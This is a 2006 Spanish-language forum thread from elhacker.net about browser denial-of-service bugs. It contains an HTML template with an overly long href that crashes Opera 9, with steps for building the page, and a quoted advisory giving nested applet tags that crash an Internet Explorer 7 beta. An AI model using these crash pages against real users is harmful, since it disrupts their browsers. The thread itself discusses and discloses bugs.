elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 04:42  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  vulnerabilidad opera
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: vulnerabilidad opera  (Leído 1,472 veces)
rubeng

Desconectado Desconectado

Mensajes: 246


Ver Perfil
vulnerabilidad opera
« en: 4 Julio 2006, 04:50 »

DENIAL OF SERVICE
http://www.freewebtown.com/rubengl/papers/exploitopera/EXPLOIT OPERA 9.zip
(zip con dos ejemplos)

Esta vulnerabilidad lo que hace es es una denegacion de servicio, al ser abierta por opera la pagina previamente preparada, hace que el uso de memoria del opera este fuera de limite y aumente progresivamente generando un desbordamiento rapido

PREPARACION DE LA PAGINA
Bueno la vulnerabilidad es explotada cuando la etiqueta a href. contiene un valor muy largo esto genera que la memoria este fuera de limite (Out-of-bounds memory)

Entonces abrimos el bloc de notas o cualquier editor que permita guardar en html y escribimos lo siguiente

<html>
<body>
<a href="http://(en este espacio debes colocar una cantidad importante de caracteres sin los parentesis) ">ruben</a>
<body>
<html>

Ejemplo

En el momento de guardarlo añadimos un .htm después de el nombre para que se pueda ejecutar como una pagina deesde el opera

Ahora vamos a abrirlo desde opera.
Al estar este indicador de esta manera

Significa que aun la pagina no ha cargado totalmente.
Cuando termine de cargar sucedera esto:

salu2
« Última modificación: 4 Julio 2006, 04:52 por rubeng » En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 16.990


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: vulnerabilidad opera
« Respuesta #1 en: 4 Julio 2006, 10:05 »

Citar
* Affected Software: Internet Explorer 7.0 Beta

* Severity: Unknown

* Impact: Crash

Código:
<html>

<body>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

<applet>

</body>

</html>

Fuente:
http://www.securityfocus.com/archive/1/438754
En línea

"elhacker.net es único, por eso no fabrica para otras marcas"  - Prohibido prohibir

alf_101010


Desconectado Desconectado

Mensajes: 706


Ver Perfil
Re: vulnerabilidad opera
« Respuesta #2 en: 4 Julio 2006, 14:11 »

MoBB: Un bug en navegadores cada día
http://www.kriptopolis.org/node/2509

http://browserfun.blogspot.com/
En línea
rubeng

Desconectado Desconectado

Mensajes: 246


Ver Perfil
Re: vulnerabilidad opera
« Respuesta #3 en: 5 Julio 2006, 03:57 »

pues estaran varios meses a una por dia ;)
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines